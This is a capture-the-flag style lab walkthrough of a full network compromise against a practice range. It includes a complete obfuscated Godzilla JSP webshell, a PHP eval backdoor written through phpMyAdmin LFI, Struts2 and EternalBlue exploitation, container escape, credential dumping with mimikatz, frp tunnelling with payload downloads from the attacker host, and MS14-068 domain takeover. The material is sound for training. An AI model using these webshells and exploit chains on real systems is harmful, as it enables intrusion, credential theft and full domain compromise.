Environment Setup
Network Configuration
Two network adapters required:
- External network: 192.168.157.0/24
- Internal network: 192.168.183.0/24
Windows 7 Configuration
Start the Win7 VM and the Domain Controller first. Do not start the web server yet.
Credentials: Dotest123
- Navigate to Control Panel → Power Options
- Set all power-saving features to "Never"
Domain Controller Setup
Login with credentials: Test2008
Update the default password upon first login.
Web Server Setup
Credentials: ubuntu
Activating Docker Services
ubuntu@ubuntu:~$ sudo -s
root@ubuntu:~# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS
ec814f6ee002 vulhub/phpmyadmin:4.8.1 "docker-php-entrypoi…" 4 years ago Exited (255)
174745108fcb vulhub/struts2:2.3.30 "/usr/local/bin/mvn-…" 4 years ago Exited (255)
09dd4e5bfa91 cve-2017-12615_tomcat "catalina.sh run" 4 years ago Exited (255)
ad7866b3df9b mysql:5.5 "docker-entrypoint.s…" 4 years ago Exited (0)
root@ubuntu:~# docker start ec814f6ee002
root@ubuntu:~# docker start 174745108fcb
root@ubuntu:~# docker start 09dd4e5bfa91
root@ubuntu:~# docker start ad7866b3df9b
Initial Reconnaissance
Host Discovery
Using arp-scan:
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.157.129
192.168.157.1 00:50:56:c0:00:02 VMware, Inc.
192.168.157.128 00:0c:29:13:4a:c1 VMware, Inc.
192.168.157.254 00:50:56:e3:f1:bc VMware, Inc.
Using netdiscover:
└─# netdiscover -s high -r 192.168.157.0/24
3 Captured ARP Req/Rep packets, from 3 hosts.
IP At MAC Address Count
192.168.157.128 00:0c:29:13:4a:c1 VMware, Inc.
Port Scanning
Quick scan:
└─# nmap -Pn 192.168.157.128
PORT STATE SERVICE
22/tcp open ssh
2001/tcp open dc
2002/tcp open globe
2003/tcp open finger
Detailed scan:
└─# nmap -sV -O 192.168.157.128
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu
2001/tcp open http Jetty 9.2.11.v20150529
2002/tcp open http Apache Tomcat 8.5.19
2003/tcp open http Apache httpd 2.4.25
Web Application Testing
Three HTTP services identified on ports 2001, 2002, and 2003.
Port 2001 - Jetty Service
Jetty is an open-source Java servlet container. Directory enumeration revealed only an /upload endpoint with limited utility.
Struts2 Vulnerability Scanning
Tool: STS2G
└─# ./ST2G --url=http://192.168.157.128:2001 --mode scan
Struts2-001 Not Vulnerable.
Struts2-005 Not Vulnerable.
*Found Struts2-045!
Command Execution:
└─# ./ST2G --url=http://192.168.157.128:2001 --mode exec --vn 45 --cmd id
uid=0(root) gid=0(root) groups=0(root)
Root-level access confirmed.
Port 2002 - Tomcat Service
Version 8.5.19 is susceptible to arbitrary file upload vulnerabilities leading to remote code execution.
Verifying File Upload Vulnerability
Configure Burp Suite proxy and intercept requests. Change HTTP method from GET to PUT and send malicious payload:
PUT /12.jsp HTTP/1.1
Host: 192.168.157.128:2002
123456
Accessing the uploaded file confirms successful upload capability.
Generating Webshell
Create JSP payload using Godzilla (password: pass):
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>
Upload the shell and connect via Godzilla.
Port 2003 - PHPMyAdmin 4.8.1
This version contains a local file inclusion vulnerability.
Arbitrary File Read:
http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
Gaining Shell via Session File Inclusion:
SQL queries get stored in session files at /tmp/sess_(sessionID). Retrieve the session ID from browser cookies (F12 DevTools).
http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_c0f9687bb896783adb49b8a91b6fac13
Writing Webshell:
Execute SQL query to write PHP backdoor:
select '<?php file_put_contents("shell.php","<?php @eval(\$_POST[1]);?>");?> ';
Refresh page with updated session ID:
http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_e42eb1251c3d92e16b840eafe8d9ea08
Access shell.php and connect with AntSword.
Container Escape
From the Tomcat foothold, enumerate the system. The presence of .dockerenv file indicates execution within a container.
/ > ls -la
Identifying Host Disk:
/ > fdisk -l
Disk /dev/sda: 10 GiB, 10737418240 bytes
/dev/sda1 * 2048 16779263 8G 83 Linux
Mounting Host Filesystem:
/ > mkdir /hostmnt
/ > mount /dev/sda1 /hostmnt
/hostmnt > dir
bin etc lib media opt root sbin tmp usr
boot home lib64 mnt proc run srv sys var
This grants access to the underlying host system's root filesystem.
SSH Key Brute Force
Located an SSH private key in home/ubuntu/.ssh. Convert and attempt cracking:
└─# vim ssh_key
└─# ssh2john ssh_key > hash
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH])
ubuntu (ssh)
Connecting via SSH:
└─# ssh -i ssh_key ubuntu@192.168.157.128
Warning: Permanently added '192.168.157.128' (ED25519) to the list of known hosts.
ubuntu@ubuntu:~$
Domain Penetration Phase
Privilege Escalation
ubuntu@ubuntu:~$ sudo -l
User ubuntu may run the following commands on ubuntu:
(ALL : ALL) ALL
ubuntu@ubuntu:~$ sudo -s
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
Check network interfaces. Discovered internal subnet: 192.168.183.0/24
Attempted fscan for internal scanning but binary incompatible with this environment.
Building Tunnel Infrastructure
Tool: frp (Fast Reverse Proxy)
Client Configuration (frpc.ini):
[common]
server_addr = 192.168.157.129
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 8989
plugin = socks5
Server Configuration (frps.ini):
[common]
bind_port = 7000
Deployment Steps:
- Download client binaries to compromised host:
root@ubuntu:~# wget http://192.168.157.129:8888/frpc
root@ubuntu:~# wget http://192.168.157.129:8888/frpc.ini
root@ubuntu:~# chmod +x frpc
- Start server on Kali:
└─# ./frps -c ./frps.ini
- Start client on Ubuntu (background):
root@ubuntu:~# ./frpc -c ./frpc.ini &
Configure Proxychains:
Edit /etc/proxychains4.conf to route traffic through the tunnel.
Internal Network Enumeration
Use Metasploit SMB version scenner through the SOCKS proxy:
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > setg proxies socks5:127.0.0.1:8989
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.183.1-255
msf6 auxiliary(scanner/smb/smb_version) > exploit
Identified two live hosts with port 445 open: 192.168.183.129 and 192.168.183.130
Exploiting MS17-010
Target: 192.168.183.129 (Win7)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ReverseAllowProxy true
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[+] 192.168.183.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1
[+] 192.168.183.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Meterpreter session 1 opened
Credential Dumping:
meterpreter > load kiwi
meterpreter > creds_all
msv credentials
===============
Username Domain NTLM
-------- ------ ----
douser DEMO bc23b0b4d5bf5ff42bc61fb62e13886e
wdigest credentials
===================
Username Domain Password
-------- ------ --------
douser DEMO Dotest123
Enabling RDP:
C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Activating Administrator Account:
C:\Windows\system32>net user administrator Admin123
C:\Windows\system32>net user administrator /active:yes
Remote Desktop Access:
└─# proxychains rdesktop 192.168.183.129
Attacking Domain Controller
Target: 192.168.183.130 (Windows Server 2008)
Available tools on douser's desktop: mimikatz, MS14-068, psexec64
MS14-068 Exploitation
Obtain domain user SID. Current session running as SYSTEM, migrate to douser's process:
meterpreter > ps -ef | grep douser
2652 892 dwm.exe x64 1 DEMO\douser
meterpreter > migrate 2652
meterpreter > getuid
Server username: DEMO\douser
meterpreter > shell
C:\Windows\system32>whoami /user
demo\douser S-1-5-21-979886063-1111900045-1414766810-1107
Generate golden ticket:
.\MS14-068.exe -u douser@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
This creates a TGT file locally.
Ticket Injection with Mimikatz
Use klist to view current tickets. Import the generated TGT to obtain domain admin privileges.
Establishing Shell on Domain Controller
PsExec64.exe /accepteula /s \\WIH-ENS2UR5TR3N cmd
Exploiting DC via EternalBlue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.130
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[+] 192.168.183.130:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7601 Service Pack 1
[+] 192.168.183.130:445 - ETERNALBLUE overwrite completed successfully
[*] Meterpreter session 2 opened
Disable Firewall:
meterpreter > shell
C:\Windows\system32>netsh advfirewall set allprofiles state off
Verify Connectivity:
meterpreter > ipconfig
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
IPv4 Address : 192.168.183.130
IPv4 Netmask : 255.255.255.0
Full domain compromise achieved. The internal network has been fully assessed from initial external access through to complete domain dominance.